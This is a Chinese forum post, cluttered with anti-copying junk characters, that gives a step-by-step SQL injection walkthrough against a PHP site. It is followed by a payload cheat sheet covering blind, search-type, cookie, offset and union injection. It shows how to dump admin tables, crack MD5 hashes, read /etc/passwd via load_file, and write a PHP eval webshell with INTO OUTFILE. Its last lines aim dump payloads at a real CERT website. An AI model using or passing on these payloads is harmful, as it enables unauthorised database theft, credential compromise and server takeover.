我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~( Q" ]) V v# y2 S# Y
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
3 t* q8 `8 n7 `& \- R) ^9 j我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。* C' B1 X$ i4 O6 J0 L
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)2 l- D( Z1 r9 r$ R* ?
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)% z+ Z7 ?% y% A- x5 Q% F
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:0 x/ W- L) p8 I( Q! Z2 w+ H' E
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
. s b' u4 S3 Y' G" k k7 a/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
2 }# ~4 ^' t/ x9 z5 W2 R' d 8 _" q( Y7 |' v7 N
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
7 D' G5 j/ M! C9 A# o5 g% a3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意( E Q9 J4 A, E$ p
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
! b/ j4 g3 H9 M5 P2 K5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。: h6 x: k _0 A' K# A
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
& \3 |6 R/ p5 g4 b8 Q: k; A2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
$ e% N6 G2 c) O% A1 v. W我就用的是第二个思路,
; G+ |5 c2 F. ?7 y* j8 x提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1--
' m3 Q( h- G. R& @6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,7 y/ V9 c7 {6 e
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--; O7 E$ r" t7 ?# L2 i2 z. \
注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
, @$ a3 t, K/ r) F2 l7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
0 |: t& r- l. P, y( j是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
9 k; V% m3 e6 o6 i( x+ Z0 o# U提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --9 S" K6 h/ Y0 ]9 [. L3 H% K1 T) x
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
- l6 |- Z; C% R! |调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
! m, S- s3 |3 j- b2 O9 `% a* k下面是一些很普遍注入方式资料:: H0 q* V$ C# w
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='" G6 q' J+ B7 U" Z; Z
拆半法
/ T7 A3 x, S: x, N) ]; [######################################$ A* k' ^6 m) S
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。9 B6 [, J& V. Y+ k2 M9 I5 E# m
and exists (select * from admin). w% Y* {1 H0 M$ u/ P; ?& m
and exists(select id from admin)
6 ~4 Q) {3 Q$ N0 S) v4 eand exists(select id from admin where id=1)
& z) Q2 O* j- K4 d* j) K8 Jand exists(select id from admin where id>1) , s' y, K6 C; r3 {1 E1 C6 [! f2 W
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
9 b3 g4 c) E' @6 `8 T( Oand exists (select username from admin)1 y1 {0 y( |, s3 J% S$ y+ T
and exists (select password from admin)+ q- A; w) g) [7 y7 A% K Z/ {
and exists (select id from admin where len(username)<10 and id=1)
! L) r5 w/ A6 N# U* l5 {8 [and exists (select id from admin where len(username)>5 and id=1)* z' \0 [7 `( [/ [
and exists (select id from admin where len(username)=6 and id=1)) Y9 X1 W0 c8 g3 x1 z
and exists (select id from admin where len(password)<10 and id=1)
$ c O$ ~, I4 v6 B' _8 G2 Hand exists (select id from admin where len(password)>5 and id=1)
4 \: g4 _9 s. ~; N+ G; T2 o+ fand exists (select id from admin where len(password)=7 and id=1)
9 B; h( f c& i2 e: ?3 ]; Z' aand (select top 1 asc(mid(username,1,1)) from admin)=97# J- y9 @# B- V' }7 g0 [
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。% c _% k3 z2 N" B. V$ ~' ^
猜第二位把username,1,1改成username,2,1就可以了。
, E$ ^; u/ y. w3 }8 c4 ?6 v/ s/ ?6 E) L猜密码把username改成password就OK了
) t, @3 u- Z8 w% Y1 Q( ^##################################################4 M( y2 Z, Q$ r8 h. G9 a+ M; \
搜索型注入
; D! ^' V, k5 @: F5 f; S- h##################################" L1 C* k6 L- b
%' and 1=1 and '%'='7 }! C: F4 @0 n4 ]
%' and exists (select * from admin) and '%'='
8 O" z- y6 ?+ j%' and exists(select id from admin where id=1) and '%'='+ t5 z, k7 D1 U7 W' M8 a
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
# j3 Y0 [* w* b& O% C5 X%' and exists (select id from admin where len(password)=7 and id=1) and '%'='& q8 k9 l8 `4 {1 U
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
& T c' h: j6 v" s' W这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='" Y) o# ~7 Z( g/ K" A3 Y) s
对于MSSQL数据库,后面可以吧 and '%'='换成--% D' K6 Y2 c- o
还有一点搜索型注入也可以使用union语句。! g" F3 z" n# a) v2 E% I
########################################################
7 T3 ~' @- Z% T$ n- l: O: Z) Y联合查询。3 }" m8 K n$ _4 ]) e! O3 B
#####################################. s7 h1 h% J v: d
order by 10$ [; D1 l: E+ L" W2 O) N% f! N
and 1=2 union select 1,2,3,4,5,6,7,8,9,10- Z5 e; B( c+ Q V; D
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin$ w r' F0 ~/ J# ?4 z
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1* d- r* g5 p2 x. ?
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
! q- E0 N) W/ H6 \6 o3 w: H' a+ {###################################
) y0 n, K3 N' Zcookie注入7 U3 \5 M$ B8 g4 t
###############################
0 Y: ~0 Y4 a5 ]0 T6 ]http://www.******.com/shownews.asp?id=127' L: `+ W; a* B u" }+ B
http://www.******.com/shownews.asp2 t0 m2 R5 c7 D! r
alert(="id="+escape("127"));( h N: \% n) Y$ W4 Z9 A; d& _% D
alert(="id="+escape("127 and 1=1"));6 O& F5 o; Q# L. Q" r, }9 j9 K
alert(="id="+escape("127 order by 10"));
! }6 h5 X* f2 y, @alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));' Q/ l- M; y2 {. l
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));, f! a0 r, l* {' g
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。( m0 v# n6 A$ E
###################################$ n. v* h6 i0 ?! v- u" S
偏移注入
7 c- ^5 W+ G( Z1 m6 V( G7 h [###########################################################. g2 h0 u; y( Q1 r& [6 @. ?
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
% P* d0 E1 s; t. ^: L, b! H$ G$ gunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin: ?* ~. f# g0 B3 { f
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)' T/ g9 c* H1 m9 e7 A t
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)) O9 j" j4 ?; T1 i W2 i4 A$ A
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
. R' ]% p2 o5 g- m- n' B* ^: sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)2 o. m; m) N8 T$ t: ~" ^
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
- H0 B0 _8 i% S( d9 ^+ E; ua.id=d.id)
& _6 M: N8 \% m% c" w2 E' X$ \and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)7 j1 m$ W7 ]' t8 S6 ~+ M9 Z
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
/ w* C, @. V w O% Z" W
9 \- k/ i+ o1 S============================================================================================================
7 D% X% f9 ?" o; u8 K5 a1.判断版本" n. N$ G2 O6 b2 V, o; V9 o( L$ _
and ord(mid(version(),1,1))>51
3 q# Z$ ~. F) m返回正常,说明大于4.0版本,支持ounion查询( w. R) Y; R" O+ V7 h
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解( X, ]5 o9 C1 D* a8 a
and 2=4 union select 1,2,3,4,5,6,7,8,9--' s5 b1 _. q* F: s6 O' \
3.查看数据库版本及当前用户,. k5 H/ s& O. ~& k" R7 b- Z
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--+ ^8 i5 |9 E- S6 q# i
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,7 J/ h6 O k3 N' b
4.判断有没有写权限
. T* D; d# e! b) @' P' H0 B mand (select count(*) from MySQL.user)>0--
$ h" g1 q" R* d, z. X# D4 J5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
, n9 s! f' b* N7 _8 g+ y0 }( b用不了这个命令,就学习土耳其黑客手法,如下
! R. v- X# E( @& E+ aand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
' ?) M9 C, L5 m; K6.爆表,爆库& }+ L5 }7 G$ a( E7 S c
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
; m' |( `4 j& E( ]0 P7.爆列名,爆表- t* e+ t1 Z0 J$ W9 E. c: ?
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# g4 D2 Y% F1 F# o# g
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
; [+ D$ e3 O2 t7 H6 D7 s: @5 pand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--' L: }0 R+ a; ?) f
9.爆字段内容) E! l5 ^* m3 b+ i3 m7 |
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--- n, |7 I* {9 l* d) U3 q4 a2 u
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |